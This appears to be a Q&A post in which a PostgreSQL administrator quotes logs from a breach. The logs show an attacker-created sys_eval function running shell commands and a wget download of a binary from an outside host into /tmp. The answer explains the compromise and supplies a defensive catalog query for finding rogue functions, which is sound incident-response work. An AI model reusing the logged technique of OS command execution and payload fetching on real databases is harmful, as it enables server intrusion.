PostgreSQL: How find functions that use sys_eval

Tags: postgresql-9.3, Security

My server was hacked; I found this in the postgres log:

2017-12-19 06:30:16 COT STATEMENT:  select sys_eval('pgrep baou87r1D9;pgrep 9rMhx24;pgrep Ps1fnYF3;pgrep P15xAw4;pgrep 8yV192n7;pgrep ktU5R693w2;pgrep VW5Ngjl;pgrep gwcaMW7;pgrep pvN195X8A;pgrep H80p3ao14Z;pgrep 6gBLwWlMrS;pgrep 78HgGw0L3;pgrep 5qKiw4e7gQ;pgrep iW35uqB60;pgrep qik7btShxK;pgrep xCi4Zze52;pgrep O0ajdnot;pgrep 6zmYcK1r;pgrep Hgb1hjvz;pgrep 38qz9Ivr;pgrep 0k693Runi;pgrep ax6fYNV;pgrep g3v50S64f7;pgrep 8y7kV496;pgrep 60m4qwFA;pgrep 0bs45q3k;pgrep 2R3e4g5l;pgrep 0a546q2T;pgrep c12yZ0v;pgrep KEq6m2kV5;');
--2017-12-19 06:31:09--  http://qwer.world/kw0rker

Resolviendo qwer.world... 138.197.116.216
Connecting to qwer.world|138.197.116.216|:80... conectado.
Petición HTTP enviada, esperando respuesta... 200 OK
Longitud: 1643240 (1.6M) [application/octet-stream]
Saving to: `/tmp/x0597078a'


I deleted the files in /tmp, stopped an unknown postgres process, and changed the firewall rules, pg_hba.conf and the password for the database user.

I don't know whether the malicious code still persists and whether I need to reinstall my PostgreSQL installation. My plan was to search for the function and try to prevent future problems, but the documentation I found for sys_eval is very limited.

How can I find where sys_eval is used in my existing code?

Best Answer

You can't find where sys_eval is used in your existing code, because this function does not exist on a clean system (unless you have gone out of your way to make it), so your code would have no reason to use it (unless of course your code base was also hacked and had stuff inserted into it). The function was created by the hacker as one of the steps of hacking your database. The hacker could have called it anything he wanted. He probably got the code here or somewhere similar, and then was too lazy to obfuscate the names.

If you are looking for where it is on the poisoned system, look in pg_proc. But this system needs to be nuked from orbit, so there is probably no point in looking. The changes you will make (on your clean system) to pg_hba, the firewall, and the database users (including the database superusers, which is where the hack happened, not just the ordinary users) should prevent them from exploiting the new system, but there is no way of telling how many trojans and backdoors were installed in the old one.
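A query for doing the pg_proc inventory the answer mentions, added here as an example that is not part of the original answer: run as a superuser in each database (pg_proc is per-database), it lists any function named like sys_eval and any C-language function whose shared object is loaded from outside $libdir (assumed to be where the legitimately installed extensions live), plus the untrusted procedural languages that are installed.

```sql
-- Added example, not the answerer's own code. Run in EVERY database
-- (\c into each one, or loop with psql), because pg_proc is per-database.

-- 1. Functions that are either named like the backdoor seen in the log
--    or are C-language functions backed by a shared object outside $libdir.
--    Built-in functions have probin IS NULL; packaged extensions use
--    '$libdir/...'. Anything else (e.g. a file under /tmp) needs explaining.
SELECT n.nspname                    AS schema_name,
       p.proname                    AS function_name,
       pg_get_userbyid(p.proowner)  AS owner,
       l.lanname                    AS language,
       p.probin                     AS shared_object,   -- .so path for C functions
       p.prosrc                     AS symbol_or_body   -- C symbol, or body for PL/SQL functions
FROM   pg_catalog.pg_proc       p
JOIN   pg_catalog.pg_language   l ON l.oid = p.prolang
JOIN   pg_catalog.pg_namespace  n ON n.oid = p.pronamespace
WHERE  p.proname ILIKE '%sys_eval%'
   OR  (l.lanname = 'c'
        AND p.probin IS NOT NULL
        AND p.probin NOT LIKE '$libdir/%')
ORDER  BY 1, 2;

-- 2. Untrusted procedural languages (plpythonu, plperlu, ...) let a
--    superuser run OS commands without any .so at all, so list them too
--    and compare against what you intentionally installed.
SELECT l.lanname,
       pg_get_userbyid(l.lanowner) AS owner
FROM   pg_catalog.pg_language l
WHERE  NOT l.lanpltrusted
  AND  l.lanname NOT IN ('internal', 'c', 'sql')
ORDER  BY 1;
```

An empty result for both queries in every database is not proof the instance is clean (the answer's point about rebuilding still stands); it only tells you what is visible in the catalogs right now.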